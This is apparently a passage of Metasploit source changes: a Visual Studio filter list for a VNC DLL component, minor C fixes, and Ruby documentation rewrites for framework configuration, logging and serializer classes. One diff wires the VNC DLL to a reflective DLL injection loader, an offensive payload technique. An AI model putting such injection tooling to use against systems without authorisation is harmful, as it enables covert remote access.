<ClCompile Include="libjpeg\jcmarker.c">
<Filter>Source Files\libjpeg</Filter>
</ClCompile>
<ClCompile Include="libjpeg\jcmaster.c">
<Filter>Source Files\libjpeg</Filter>
</ClCompile>
<ClCompile Include="libjpeg\jcomapi.c">
<Filter>Source Files\libjpeg</Filter>
</ClCompile>
<ClCompile Include="libjpeg\jcparam.c">
<Filter>Source Files\libjpeg</Filter>
</ClCompile>
<ClCompile Include="libjpeg\jcphuff.c">
<Filter>Source Files\libjpeg</Filter>
</ClCompile>
<ClCompile Include="libjpeg\jcprepct.c">
<Filter>Source Files\libjpeg</Filter>
</ClCompile>
<ClCompile Include="libjpeg\jcsample.c">
<Filter>Source Files\libjpeg</Filter>
</ClCompile>
<ClCompile Include="libjpeg\jctrans.c">
<Filter>Source Files\libjpeg</Filter>
</ClCompile>
<ClCompile Include="libjpeg\jdapimin.c">
<Filter>Source Files\libjpeg</Filter>
</ClCompile>
<ClCompile Include="libjpeg\jdapistd.c">
<Filter>Source Files\libjpeg</Filter>
</ClCompile>
<ClCompile Include="libjpeg\jdatadst.c">
<Filter>Source Files\libjpeg</Filter>
</ClCompile>
<ClCompile Include="libjpeg\jdatasrc.c">
<Filter>Source Files\libjpeg</Filter>
</ClCompile>
<ClCompile Include="libjpeg\jdcoefct.c">
<Filter>Source Files\libjpeg</Filter>
</ClCompile>
<ClCompile Include="libjpeg\jdcolor.c">
<Filter>Source Files\libjpeg</Filter>
</ClCompile>
<ClCompile Include="libjpeg\jddctmgr.c">
<Filter>Source Files\libjpeg</Filter>
</ClCompile>
<ClCompile Include="libjpeg\jdhuff.c">
<Filter>Source Files\libjpeg</Filter>
</ClCompile>
<ClCompile Include="libjpeg\jdinput.c">
<Filter>Source Files\libjpeg</Filter>
</ClCompile>
<ClCompile Include="libjpeg\jdmainct.c">
<Filter>Source Files\libjpeg</Filter>
</ClCompile>
<ClCompile Include="libjpeg\jdmarker.c">
<Filter>Source Files\libjpeg</Filter>
</ClCompile>
<ClCompile Include="libjpeg\jdmaster.c">
<Filter>Source Files\libjpeg</Filter>
</ClCompile>
<ClCompile Include="libjpeg\jdmerge.c">
<Filter>Source Files\libjpeg</Filter>
</ClCompile>
<ClCompile Include="libjpeg\jdphuff.c">
<Filter>Source Files\libjpeg</Filter>
</ClCompile>
<ClCompile Include="libjpeg\jdpostct.c">
<Filter>Source Files\libjpeg</Filter>
</ClCompile>
<ClCompile Include="libjpeg\jdsample.c">
<Filter>Source Files\libjpeg</Filter>
</ClCompile>
<ClCompile Include="libjpeg\jdtrans.c">
<Filter>Source Files\libjpeg</Filter>
</ClCompile>
<ClCompile Include="libjpeg\jerror.c">
<Filter>Source Files\libjpeg</Filter>
</ClCompile>
<ClCompile Include="libjpeg\jfdctflt.c">
<Filter>Source Files\libjpeg</Filter>
</ClCompile>
<ClCompile Include="libjpeg\jfdctfst.c">
<Filter>Source Files\libjpeg</Filter>
</ClCompile>
<ClCompile Include="libjpeg\jfdctint.c">
<Filter>Source Files\libjpeg</Filter>
</ClCompile>
<ClCompile Include="libjpeg\jidctflt.c">
<Filter>Source Files\libjpeg</Filter>
</ClCompile>
<ClCompile Include="libjpeg\jidctfst.c">
<Filter>Source Files\libjpeg</Filter>
</ClCompile>
<ClCompile Include="libjpeg\jidctint.c">
<Filter>Source Files\libjpeg</Filter>
</ClCompile>
<ClCompile Include="libjpeg\jidctred.c">
<Filter>Source Files\libjpeg</Filter>
</ClCompile>
<ClCompile Include="libjpeg\jmemmgr.c">
<Filter>Source Files\libjpeg</Filter>
</ClCompile>
<ClCompile Include="libjpeg\jmemnobs.c">
<Filter>Source Files\libjpeg</Filter>
</ClCompile>
<ClCompile Include="libjpeg\jquant1.c">
<Filter>Source Files\libjpeg</Filter>
</ClCompile>
<ClCompile Include="libjpeg\jquant2.c">
<Filter>Source Files\libjpeg</Filter>
</ClCompile>
<ClCompile Include="libjpeg\jutils.c">
<Filter>Source Files\libjpeg</Filter>
</ClCompile>
<ClCompile Include="zlib\adler32.c">
<Filter>Source Files\zlib</Filter>
</ClCompile>
<ClCompile Include="zlib\compress.c">
<Filter>Source Files\zlib</Filter>
</ClCompile>
<ClCompile Include="zlib\crc32.c">
<Filter>Source Files\zlib</Filter>
</ClCompile>
<ClCompile Include="zlib\deflate.c">
<Filter>Source Files\zlib</Filter>
</ClCompile>
<ClCompile Include="zlib\infblock.c">
<Filter>Source Files\zlib</Filter>
</ClCompile>
<ClCompile Include="zlib\infcodes.c">
<Filter>Source Files\zlib</Filter>
</ClCompile>
<ClCompile Include="zlib\inffast.c">
<Filter>Source Files\zlib</Filter>
</ClCompile>
<ClCompile Include="zlib\inflate.c">
<Filter>Source Files\zlib</Filter>
</ClCompile>
<ClCompile Include="zlib\inftrees.c">
<Filter>Source Files\zlib</Filter>
</ClCompile>
<ClCompile Include="zlib\infutil.c">
<Filter>Source Files\zlib</Filter>
</ClCompile>
<ClCompile Include="zlib\maketree.c">
<Filter>Source Files\zlib</Filter>
</ClCompile>
<ClCompile Include="zlib\trees.c">
<Filter>Source Files\zlib</Filter>
</ClCompile>
<ClCompile Include="zlib\uncompr.c">
<Filter>Source Files\zlib</Filter>
</ClCompile>
<ClCompile Include="zlib\zutil.c">
<Filter>Source Files\zlib</Filter>
</ClCompile>
<ClCompile Include="d3des.c">
<Filter>Source Files\winvnc</Filter>
</ClCompile>
<ClCompile Include="DynamicFn.cpp">
<Filter>Source Files\winvnc</Filter>
</ClCompile>
<ClCompile Include="FileTransferItemInfo.cpp">
<Filter>Source Files\winvnc</Filter>
</ClCompile>
<ClCompile Include="MinMax.cpp">
<Filter>Source Files\winvnc</Filter>
</ClCompile>
<ClCompile Include="RectList.cpp">
<Filter>Source Files\winvnc</Filter>
</ClCompile>
<ClCompile Include="stdhdrs.cpp">
<Filter>Source Files\winvnc</Filter>
</ClCompile>
<ClCompile Include="tableinitcmtemplate.cpp">
<Filter>Source Files\winvnc</Filter>
</ClCompile>
<ClCompile Include="tableinittctemplate.cpp">
<Filter>Source Files\winvnc</Filter>
</ClCompile>
<ClCompile Include="tabletranstemplate.cpp">
<Filter>Source Files\winvnc</Filter>
</ClCompile>
<ClCompile Include="translate.cpp">
<Filter>Source Files\winvnc</Filter>
</ClCompile>
<ClCompile Include="TsSessions.cpp">
<Filter>Source Files\winvnc</Filter>
</ClCompile>
<ClCompile Include="VideoDriver.cpp">
<Filter>Source Files\winvnc</Filter>
</ClCompile>
<ClCompile Include="vncauth.c">
<Filter>Source Files\winvnc</Filter>
</ClCompile>
<ClCompile Include="vncBuffer.cpp">
<Filter>Source Files\winvnc</Filter>
</ClCompile>
<ClCompile Include="vncClient.cpp">
<Filter>Source Files\winvnc</Filter>
</ClCompile>
<ClCompile Include="vncDesktop.cpp">
<Filter>Source Files\winvnc</Filter>
</ClCompile>
<ClCompile Include="vncInstHandler.cpp">
<Filter>Source Files\winvnc</Filter>
</ClCompile>
<ClCompile Include="vncKeymap.cpp">
<Filter>Source Files\winvnc</Filter>
</ClCompile>
<ClCompile Include="vncRegion.cpp">
<Filter>Source Files\winvnc</Filter>
</ClCompile>
<ClCompile Include="vncServer.cpp">
<Filter>Source Files\winvnc</Filter>
</ClCompile>
<ClCompile Include="vncService.cpp">
<Filter>Source Files\winvnc</Filter>
</ClCompile>
<ClCompile Include="vncSockConnect.cpp">
<Filter>Source Files\winvnc</Filter>
</ClCompile>
<ClCompile Include="VSocket.cpp">
<Filter>Source Files\winvnc</Filter>
</ClCompile>
<ClCompile Include="WallpaperUtils.cpp">
<Filter>Source Files\winvnc</Filter>
</ClCompile>
</ItemGroup>
<ItemGroup>
<ClInclude Include="omnithread\nt.h">
<Filter>Source Files\omnithread</Filter>
</ClInclude>
<ClInclude Include="omnithread\omnithread.h">
<Filter>Source Files\omnithread</Filter>
</ClInclude>
<ClInclude Include="common.h">
<Filter>Header Files</Filter>
</ClInclude>
<ClInclude Include="libjpeg\jchuff.h">
<Filter>Header Files\libjpeg</Filter>
</ClInclude>
<ClInclude Include="libjpeg\jconfig.h">
<Filter>Header Files\libjpeg</Filter>
</ClInclude>
<ClInclude Include="libjpeg\jdct.h">
<Filter>Header Files\libjpeg</Filter>
</ClInclude>
<ClInclude Include="libjpeg\jdhuff.h">
<Filter>Header Files\libjpeg</Filter>
</ClInclude>
<ClInclude Include="libjpeg\jerror.h">
<Filter>Header Files\libjpeg</Filter>
</ClInclude>
<ClInclude Include="libjpeg\jinclude.h">
<Filter>Header Files\libjpeg</Filter>
</ClInclude>
<ClInclude Include="libjpeg\jmemsys.h">
<Filter>Header Files\libjpeg</Filter>
</ClInclude>
<ClInclude Include="libjpeg\jmorecfg.h">
<Filter>Header Files\libjpeg</Filter>
</ClInclude>
<ClInclude Include="libjpeg\jpegint.h">
<Filter>Header Files\libjpeg</Filter>
</ClInclude>
<ClInclude Include="libjpeg\jpeglib.h">
<Filter>Header Files\libjpeg</Filter>
</ClInclude>
<ClInclude Include="libjpeg\jversion.h">
<Filter>Header Files\libjpeg</Filter>
</ClInclude>
<ClInclude Include="zlib\deflate.h">
<Filter>Header Files\zlib</Filter>
</ClInclude>
<ClInclude Include="zlib\infblock.h">
<Filter>Header Files\zlib</Filter>
</ClInclude>
<ClInclude Include="zlib\infcodes.h">
<Filter>Header Files\zlib</Filter>
</ClInclude>
<ClInclude Include="zlib\inffast.h">
<Filter>Header Files\zlib</Filter>
</ClInclude>
<ClInclude Include="zlib\inffixed.h">
<Filter>Header Files\zlib</Filter>
</ClInclude>
<ClInclude Include="zlib\inftrees.h">
<Filter>Header Files\zlib</Filter>
</ClInclude>
<ClInclude Include="zlib\infutil.h">
<Filter>Header Files\zlib</Filter>
</ClInclude>
<ClInclude Include="zlib\trees.h">
<Filter>Header Files\zlib</Filter>
</ClInclude>
<ClInclude Include="zlib\zconf.h">
<Filter>Header Files\zlib</Filter>
</ClInclude>
<ClInclude Include="zlib\zlib.h">
<Filter>Header Files\zlib</Filter>
</ClInclude>
<ClInclude Include="zlib\zutil.h">
<Filter>Header Files\zlib</Filter>
</ClInclude>
<ClInclude Include="AdministrationControls.h">
<Filter>Header Files\winvnc</Filter>
</ClInclude>
<ClInclude Include="d3des.h">
<Filter>Header Files\winvnc</Filter>
</ClInclude>
<ClInclude Include="DynamicFn.h">
<Filter>Header Files\winvnc</Filter>
</ClInclude>
<ClInclude Include="FileTransferItemInfo.h">
<Filter>Header Files\winvnc</Filter>
</ClInclude>
<ClInclude Include="IncomingConnectionsControls.h">
<Filter>Header Files\winvnc</Filter>
</ClInclude>
<ClInclude Include="InputHandlingControls.h">
<Filter>Header Files\winvnc</Filter>
</ClInclude>
<ClInclude Include="keysymdef.h">
<Filter>Header Files\winvnc</Filter>
</ClInclude>
<ClInclude Include="MatchWindow.h">
<Filter>Header Files\winvnc</Filter>
</ClInclude>
<ClInclude Include="MinMax.h">
<Filter>Header Files\winvnc</Filter>
</ClInclude>
<ClInclude Include="PollControls.h">
<Filter>Header Files\winvnc</Filter>
</ClInclude>
<ClInclude Include="QuerySettingsControls.h">
<Filter>Header Files\winvnc</Filter>
</ClInclude>
<ClInclude Include="RectList.h">
<Filter>Header Files\winvnc</Filter>
</ClInclude>
<ClInclude Include="resource.h">
<Filter>Header Files\winvnc</Filter>
</ClInclude>
<ClInclude Include="rfb.h">
<Filter>Header Files\winvnc</Filter>
</ClInclude>
<ClInclude Include="rfbproto.h">
<Filter>Header Files\winvnc</Filter>
</ClInclude>
<ClInclude Include="SharedDesktopArea.h">
<Filter>Header Files\winvnc</Filter>
</ClInclude>
<ClInclude Include="stdhdrs.h">
<Filter>Header Files\winvnc</Filter>
</ClInclude>
<ClInclude Include="translate.h">
<Filter>Header Files\winvnc</Filter>
</ClInclude>
<ClInclude Include="TsSessions.h">
<Filter>Header Files\winvnc</Filter>
</ClInclude>
<ClInclude Include="VideoDriver.h">
<Filter>Header Files\winvnc</Filter>
</ClInclude>
<ClInclude Include="vncAbout.h">
<Filter>Header Files\winvnc</Filter>
</ClInclude>
<ClInclude Include="vncauth.h">
<Filter>Header Files\winvnc</Filter>
</ClInclude>
<ClInclude Include="vncBuffer.h">
<Filter>Header Files\winvnc</Filter>
</ClInclude>
<ClInclude Include="vncClient.h">
<Filter>Header Files\winvnc</Filter>
</ClInclude>
<ClInclude Include="vncDesktop.h">
<Filter>Header Files\winvnc</Filter>
</ClInclude>
<ClInclude Include="vncEncodeCoRRE.h">
<Filter>Header Files\winvnc</Filter>
</ClInclude>
<ClInclude Include="vncEncodeHexT.h">
<Filter>Header Files\winvnc</Filter>
</ClInclude>
<ClInclude Include="vncEncoder.h">
<Filter>Header Files\winvnc</Filter>
</ClInclude>
<ClInclude Include="vncEncodeRRE.h">
<Filter>Header Files\winvnc</Filter>
</ClInclude>
<ClInclude Include="vncEncodeTight.h">
<Filter>Header Files\winvnc</Filter>
</ClInclude>
<ClInclude Include="vncEncodeZlib.h">
<Filter>Header Files\winvnc</Filter>
</ClInclude>
<ClInclude Include="vncEncodeZlibHex.h">
<Filter>Header Files\winvnc</Filter>
</ClInclude>
<ClInclude Include="vncInstHandler.h">
<Filter>Header Files\winvnc</Filter>
</ClInclude>
<ClInclude Include="vncKeymap.h">
<Filter>Header Files\winvnc</Filter>
</ClInclude>
<ClInclude Include="vncPasswd.h">
<Filter>Header Files\winvnc</Filter>
</ClInclude>
<ClInclude Include="vncRegion.h">
<Filter>Header Files\winvnc</Filter>
</ClInclude>
<ClInclude Include="vncServer.h">
<Filter>Header Files\winvnc</Filter>
</ClInclude>
<ClInclude Include="vncService.h">
<Filter>Header Files\winvnc</Filter>
</ClInclude>
<ClInclude Include="vncSockConnect.h">
<Filter>Header Files\winvnc</Filter>
</ClInclude>
<ClInclude Include="VSocket.h">
<Filter>Header Files\winvnc</Filter>
</ClInclude>
<ClInclude Include="VTypes.h">
<Filter>Header Files\winvnc</Filter>
</ClInclude>
<ClInclude Include="WallpaperUtils.h">
<Filter>Header Files\winvnc</Filter>
</ClInclude>
</ItemGroup>
<ItemGroup>
<Text Include="README.TXT">
<Filter>Header Files\winvnc</Filter>
</Text>
</ItemGroup>
</Project>

2
external/source/vncdll/winvnc/vncDesktop.cpp vendored Normal file → Executable file
View File

@ -2906,7 +2906,7 @@ bool bDbgBmDump(
TCHAR szFileName[MAX_PATH];
sprintf(
szFileName,
"%04u.%02u.%02u-%02u-%02u-%02u-0x%08x.bmp",
"%04u.%02u.%02u-%02u-%02u-%02u-0x%08p.bmp",
stm.wYear, stm.wMonth, stm.wDay,
stm.wHour, stm.wMinute, stm.wSecond,
ptr);

2
external/source/vncdll/winvnc/vncdll.cpp vendored Normal file → Executable file
View File

@ -15,7 +15,7 @@
*/
#define REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR
#define REFLECTIVEDLLINJECTION_CUSTOM_DLLMAIN
#include "ReflectiveLoader.c"
#include "../../../ReflectiveDLLInjection/dll/src/ReflectiveLoader.c"
HANDLE hMessageMutex = NULL;

2
external/source/vncdll/winvnc/zlib/inffast.c vendored Normal file → Executable file
View File

@ -99,7 +99,7 @@ z_streamp z;
do {
r += s->end - s->window; /* force pointer in window */
} while (r < s->window); /* covers invalid distances */
e = s->end - r;
e = (uInt)(s->end - r);
if (c > e)
{
c -= e; /* wrapped copy */

2
external/source/vncdll/winvnc/zlib/inflate.c vendored Normal file → Executable file
View File

@ -334,7 +334,7 @@ z_streamp z;
}
/* restore */
z->total_in += p - z->next_in;
z->total_in += (uLong)(p - z->next_in);
z->next_in = p;
z->avail_in = n;
z->state->sub.marker = m;

2
external/source/vncdll/winvnc/zlib/infutil.h vendored Normal file → Executable file
View File

@ -64,7 +64,7 @@ struct inflate_blocks_state {
/* defines for inflate input/output */
/* update pointers and return */
#define UPDBITS {s->bitb=b;s->bitk=k;}
#define UPDIN {z->avail_in=n;z->total_in+=p-z->next_in;z->next_in=p;}
#define UPDIN {z->avail_in=n;z->total_in+=(uLong)(p-z->next_in);z->next_in=p;}
#define UPDOUT {s->write=q;}
#define UPDATE {UPDBITS UPDIN UPDOUT}
#define LEAVE {UPDATE return inflate_flush(s,z,r);}

147
lib/msf/base/config.rb
View File

@ -3,22 +3,16 @@ require 'fileutils'
module Msf
###
#
# This class wraps interaction with global configuration that can be used as a
# persistent storage point for configuration, logs, and other such fun things.
#
###
class Config < Hash
#
# The installation root directory for the distribution
#
# The installation's root directory for the distribution
InstallRoot = File.expand_path(File.join(File.dirname(__FILE__), '..', '..', '..'))
#
# Determines the base configuration directory.
#
# @return [String] the base configuration directory
def self.get_config_root
# Use MSFCFGDIR environment variable first. See feature request #5797
@ -47,7 +41,11 @@ class Config < Hash
#
# Default values
#
# Default system file separator.
FileSep = File::SEPARATOR
# Default configuration locations.
Defaults =
{
'ConfigDirectory' => get_config_root,
@ -68,247 +66,260 @@ class Config < Hash
#
##
#
# Returns the framework installation root.
#
# @return [String] the framework installation root {InstallRoot}.
def self.install_root
InstallRoot
end
# Returns the configuration directory default.
#
# Calls the instance method.
#
# @return [String] the root configuration directory.
def self.config_directory
self.new.config_directory
end
# Returns the global module directory.
#
# Calls the instance method.
#
# @return [String] path to global module directory.
def self.module_directory
self.new.module_directory
end
# Returns the path that scripts can be loaded from.
#
# Calls the instance method.
#
# @return [String] path to script directory.
def self.script_directory
self.new.script_directory
end
# Returns the directory that log files should be stored in.
#
# Calls the instance method.
#
# @return [String] path to log directory.
def self.log_directory
self.new.log_directory
end
# Returns the directory that plugins are stored in.
#
# Calls the instance method.
#
# @return [String] path to plugin directory.
def self.plugin_directory
self.new.plugin_directory
end
# Returns the user-specific plugin base path
#
# Calls the instance method.
#
# @return [String] path to user-specific plugin directory.
def self.user_plugin_directory
self.new.user_plugin_directory
end
# Returns the directory in which session log files are to reside.
#
# Calls the instance method.
#
# @return [String] path to session log directory.
def self.session_log_directory
self.new.session_log_directory
end
# Returns the directory in which captured data will reside.
#
# Calls the instance method.
#
# @return [String] path to loot directory.
def self.loot_directory
self.new.loot_directory
end
# Returns the directory in which locally-generated data will reside.
#
# Calls the instance method.
#
# @return [String] path to locally-generated data directory.
def self.local_directory
self.new.local_directory
end
# Returns the user-specific module base path
#
# Calls the instance method.
#
# @return [String] path to user-specific modules directory.
def self.user_module_directory
self.new.user_module_directory
end
# Returns the user-specific script base path
#
# Calls the instance method.
#
# @return [String] path to user-specific script directory.
def self.user_script_directory
self.new.user_script_directory
end
# Returns the data directory
#
# Calls the instance method.
#
# @return [String] path to data directory.
def self.data_directory
self.new.data_directory
end
# Returns the full path to the configuration file.
#
# Calls the instance method.
#
# @return [String] path to the configuration file.
def self.config_file
self.new.config_file
end
# Returns the full path to the history file.
#
# Calls the instance method.
#
# @return [String] path the history file.
def self.history_file
self.new.history_file
end
# Initializes configuration, creating directories as necessary.
#
# Calls the instance method.
#
# @return [void]
def self.init
self.new.init
end
# Loads configuration from the supplied file path, or the default one if
# none is specified.
#
# Calls the instance method.
#
# @param path [String] the path to the configuration file.
# @return [Rex::Parser::Ini] INI file parser.
def self.load(path = nil)
self.new.load(path)
end
# Saves configuration to the path specified in the ConfigFile hash key or
# the default path if one isn't specified. The options should be group
# references that have named value pairs.
#
# Calls the instance method.
#
# @param opts [Hash] Hash containing configuration options.
# @option opts 'ConfigFile' [Hash] configuration file these options apply
# to.
# @return [void]
# @example Save 'Cat' => 'Foo' in group 'ExampleGroup'
# save(
# 'ExampleGroup' =>
# {
# 'Foo' => 'Cat'
# })
def self.save(opts)
self.new.save(opts)
end
#
# Updates the config class' self with the default hash.
#
# @return [Hash] the updated Hash.
def initialize
update(Defaults)
end
#
# Returns the installation root directory
#
# @return [String] the installation root directory {InstallRoot}.
def install_root
InstallRoot
end
#
# Returns the configuration directory default.
#
# @return [String] the root configuration directory.
def config_directory
self['ConfigDirectory']
end
#
# Returns the full path to the configuration file.
#
# @return [String] path to the configuration file.
def config_file
config_directory + FileSep + self['ConfigFile']
end
# Returns the full path to the history file.
#
# Returns the full path to the configuration file.
#
# @return [String] path the history file.
def history_file
config_directory + FileSep + "history"
end
#
# Returns the global module directory.
#
# @return [String] path to global module directory.
def module_directory
install_root + FileSep + self['ModuleDirectory']
end
#
# Returns the path that scripts can be loaded from.
#
# @return [String] path to script directory.
def script_directory
install_root + FileSep + self['ScriptDirectory']
end
#
# Returns the directory that log files should be stored in.
#
# @return [String] path to log directory.
def log_directory
config_directory + FileSep + self['LogDirectory']
end
#
# Returns the directory that plugins are stored in.
#
# @return [String] path to plugin directory.
def plugin_directory
install_root + FileSep + self['PluginDirectory']
end
#
# Returns the directory in which session log files are to reside.
#
# @return [String] path to session log directory.
def session_log_directory
config_directory + FileSep + self['SessionLogDirectory']
end
#
# Returns the directory in which captured data will reside.
#
# @return [String] path to loot directory.
def loot_directory
config_directory + FileSep + self['LootDirectory']
end
#
# Returns the directory in which locally-generated data will reside.
#
# @return [String] path to locally-generated data directory.
def local_directory
config_directory + FileSep + self['LocalDirectory']
end
#
# Returns the user-specific module base path
#
# @return [String] path to user-specific modules directory.
def user_module_directory
config_directory + FileSep + "modules"
end
#
# Returns the user-specific plugin base path
#
# @return [String] path to user-specific plugin directory.
def user_plugin_directory
config_directory + FileSep + "plugins"
end
#
# Returns the user-specific script base path
#
# @return [String] path to user-specific script directory.
def user_script_directory
config_directory + FileSep + "scripts"
end
#
# Returns the data directory
#
# @return [String] path to data directory.
def data_directory
install_root + FileSep + self['DataDirectory']
end
#
# Initializes configuration, creating directories as necessary.
#
# @return [void]
def init
FileUtils.mkdir_p(module_directory)
FileUtils.mkdir_p(config_directory)
@ -320,27 +331,31 @@ class Config < Hash
FileUtils.mkdir_p(user_plugin_directory)
end
#
# Loads configuration from the supplied file path, or the default one if
# none is specified.
#
# @param path [String] the path to the configuration file.
# @return [Rex::Parser::Ini] INI file parser.
def load(path = nil)
path = config_file if (!path)
return Rex::Parser::Ini.new(path)
end
#
# Saves configuration to the path specified in the ConfigFile hash key or
# the default path is one isn't specified. The options should be group
# references that have named value pairs. Example:
# the default path if one isn't specified. The options should be group
# references that have named value pairs.
#
# @param opts [Hash] Hash containing configuration options.
# @option opts 'ConfigFile' [Hash] configuration file these options apply
# to.
# @return [void]
# @example Save 'Cat' => 'Foo' in group 'ExampleGroup'
# save(
# 'ExampleGroup' =>
# {
# 'Foo' => 'Cat'
# })
#
def save(opts)
ini = Rex::Parser::Ini.new(opts['ConfigFile'] || config_file)

32
lib/msf/base/logging.rb
View File

@ -4,19 +4,19 @@ require 'msf/base'
module Msf
###
#
# This module provides an initialization interface for logging.
#
###
class Logging
#Is logging initialized
#@private
@@initialized = false
#Is session logging enabled
#@private
@@session_logging = false
#
# Initialize logging.
#
# @return [void]
def self.init
if (! @@initialized)
@@initialized = true
@ -35,9 +35,13 @@ class Logging
end
end
# Enables a log source of name src. Creates the .log file in the
# configured directory if logging is not already enabled for this
# source.
#
# Enables a log source.
#
# @param src [String] log source name.
# @param level [Integer] logging level.
# @return [void]
def self.enable_log_source(src, level = 0)
if (log_source_registered?(src) == false)
f = Rex::Logging::Sinks::Flatfile.new(
@ -47,30 +51,33 @@ class Logging
end
end
#
# Stops logging for a given log source.
#
# @param src [String] the log source to disable.
# @return [Boolean] true if successful. false if not.
def self.disable_log_source(src)
deregister_log_source(src)
end
#
# Sets whether or not session logging is to be enabled.
#
# @param tf [Boolean] true if enabling. false if disabling.
# @return [void]
def self.enable_session_logging(tf)
@@session_logging = tf
end
#
# Returns whether or not session logging is enabled.
#
# @return [Boolean] true if enabled. false if disabled.
def self.session_logging_enabled?
@@session_logging || false
end
#
# Starts logging for a given session.
#
# @param session [Msf::Session] the session to start logging on.
# @return [void]
def self.start_session_log(session)
if (log_source_registered?(session.log_source) == false)
f = Rex::Logging::Sinks::Flatfile.new(
@ -82,9 +89,10 @@ class Logging
end
end
#
# Stops logging for a given session.
#
# @param session [Msf::Session] the session to stop logging.
# @return [Boolean] true if sucessful. false if not.
def self.stop_session_log(session)
rlog("\n[*] Logging stopped: #{Time.now}\n\n", session.log_source)

23
lib/msf/base/persistent_storage.rb
View File

@ -1,24 +1,25 @@
# -*- coding: binary -*-
module Msf
###
#
# This class provides a generalized interface to persisting information,
# either in whole or in part, about the state of the framework. This can
# be used to store data that can later be reinitialized in a new instance
# of the framework or to provide a simple mechanism for generating reports
# of some form.
#
###
# @abstract Subclass and override {#initialize}, {#store}, and {#fetch}.
class PersistentStorage
@@storage_classes = {}
#
# Creates an instance of the storage class with the supplied name. The
# array supplied as an argument is passed to the constructor of the
# associated class as a means of generic initialization.
#
# @param name [String] the name of the storage class.
# @param params [Object] the parameters to give the new class.
# @return [PersistentStorage] the newly created class.
# @return [nil] if class has not been added through {.add_storage_class}.
def self.create(name, *params)
if (klass = @@storage_classes[name])
klass.new(*params)
@ -27,36 +28,42 @@ class PersistentStorage
end
end
#
# Stub initialization routine that takes the params passed to create.
#
# @param params [Object] the parameters to initialize with.
def initialize(*params)
end
#
# This methods stores all or part of the current state of the supplied
# framework instance to whatever medium the derived class implements.
# If the derived class does not implement this method, the
# NotImplementedError is raised.
#
# @param framework [Msf::Framework] framework state to store.
# @return [void] no implementation.
# @raise [NotImpementedError] raised if not implemented.
def store(framework)
raise NotImplementedError
end
#
# This method initializes the supplied framework instance with the state
# that is stored in the persisted backing that the derived class
# implements. If the derived class does not implement this method, the
# NotImplementedError is raised.
#
# @param framework [Msf::Framework] framework to restore state to.
# @return [void] no implementation.
# @raise [NotImplementedError] raised if not implemented.
def fetch(framework)
raise NotImplementedError
end
#
# This method adds a new storage class to the hash of storage classes that
# can be created through create.
#
# @param name [String] the name of the storage class.
# @param klass [PersistentStorage] the storage class to add.
# @return [void]
def self.add_storage_class(name, klass)
@@storage_classes[name] = klass
end

14
lib/msf/base/persistent_storage/flatfile.rb
View File

@ -2,30 +2,29 @@
module Msf
class PersistentStorage
###
#
# This class persists the state of the framework to a flatfile in a human
# readable format. At the moment, the level of information it conveys is
# rather basic and ugly, but this is just a prototype, so it will be improved.
# Oh yes, it will be improved.
#
###
class Flatfile < PersistentStorage
#
# Initializes the flatfile for storage based on the parameters specified.
# The hash must contain a FilePath attribute.
#
# @overload initialize(path)
# Initializes the flatfile with the set path.
# @param path [String] path of the flatfile.
def initialize(*params)
raise ArgumentError, "You must specify a file path" if (params.length == 0)
self.path = params[0]
end
#
# This method stores the current state of the framework in human readable
# form to a flatfile. This can be used as a reporting mechanism.
#
# @param framework [Msf:::Framework] the Framework to store.
# @return [void]
def store(framework)
# Open the supplied file path for writing.
self.fd = File.new(self.path, "w")
@ -41,10 +40,11 @@ protected
attr_accessor :fd, :path # :nodoc:
#
# This method stores general information about the current state of the
# framework instance.
#
# @param framework [Msf::Framework] the Framework to store.
# @return [void]
def store_general(framework)
fd.print(
"\n" +

100
lib/msf/base/serializer/readable_text.rb
View File

@ -2,22 +2,22 @@
module Msf
module Serializer
###
#
# This class formats information in a plain-text format that
# is meant to be displayed on a console or some other non-GUI
# medium.
#
###
class ReadableText
#Default number of characters to wrap at.
DefaultColumnWrap = 70
#Default number of characters to indent.
DefaultIndent = 2
#
# Returns a formatted string that contains information about
# the supplied module instance.
#
# @param mod [Msf::Module] the module to dump information for.
# @param indent [String] the indentation to use.
# @return [String] formatted text output of the dump.
def self.dump_module(mod, indent = " ")
case mod.type
when MODULE_PAYLOAD
@ -37,9 +37,14 @@ class ReadableText
end
end
#
# Dumps an exploit's targets.
#
# @param mod [Msf::Exploit] the exploit module to dump targets
# for.
# @param indent [String] the indentation to use (only the length
# matters).
# @param h [String] the string to display as the table heading.
# @return [String] the string form of the table.
def self.dump_exploit_targets(mod, indent = '', h = nil)
tbl = Rex::Ui::Text::Table.new(
'Indent' => indent.length,
@ -57,9 +62,13 @@ class ReadableText
tbl.to_s + "\n"
end
#
# Dumps the exploit's selected target
#
# @param mod [Msf::Exploit] the exploit module.
# @param indent [String] the indentation to use (only the length
# matters)
# @param h [String] the string to display as the table heading.
# @return [String] the string form of the table.
def self.dump_exploit_target(mod, indent = '', h = nil)
tbl = Rex::Ui::Text::Table.new(
'Indent' => indent.length,
@ -75,9 +84,13 @@ class ReadableText
tbl.to_s + "\n"
end
#
# Dumps an auxiliary's actions
#
# @param mod [Msf::Auxiliary] the auxiliary module.
# @param indent [String] the indentation to use (only the length
# matters)
# @param h [String] the string to display as the table heading.
# @return [String] the string form of the table.
def self.dump_auxiliary_actions(mod, indent = '', h = nil)
tbl = Rex::Ui::Text::Table.new(
'Indent' => indent.length,
@ -95,10 +108,14 @@ class ReadableText
tbl.to_s + "\n"
end
#
# Dumps the table of payloads that are compatible with the supplied
# exploit.
#
# @param exploit [Msf::Exploit] the exploit module.
# @param indent [String] the indentation to use (only the length
# matters)
# @param h [String] the string to display as the table heading.
# @return [String] the string form of the table.
def self.dump_compatible_payloads(exploit, indent = '', h = nil)
tbl = Rex::Ui::Text::Table.new(
'Indent' => indent.length,
@ -116,9 +133,11 @@ class ReadableText
tbl.to_s + "\n"
end
#
# Dumps information about an exploit module.
#
# @param mod [Msf::Exploit] the exploit module.
# @param indent [String] the indentation to use.
# @return [String] the string form of the information.
def self.dump_exploit_module(mod, indent = '')
output = "\n"
output << " Name: #{mod.name}\n"
@ -171,9 +190,11 @@ class ReadableText
end
#
# Dumps information about an auxiliary module.
#
# @param mod [Msf::Auxiliary] the auxiliary module.
# @param indent [String] the indentation to use.
# @return [String] the string form of the information.
def self.dump_auxiliary_module(mod, indent = '')
output = "\n"
output << " Name: #{mod.name}\n"
@ -207,9 +228,11 @@ class ReadableText
return output
end
#
# Dumps information about a payload module.
#
# @param mod [Msf::Payload] the payload module.
# @param indent [String] the indentation to use.
# @return [String] the string form of the information.
def self.dump_payload_module(mod, indent = '')
# General
output = "\n"
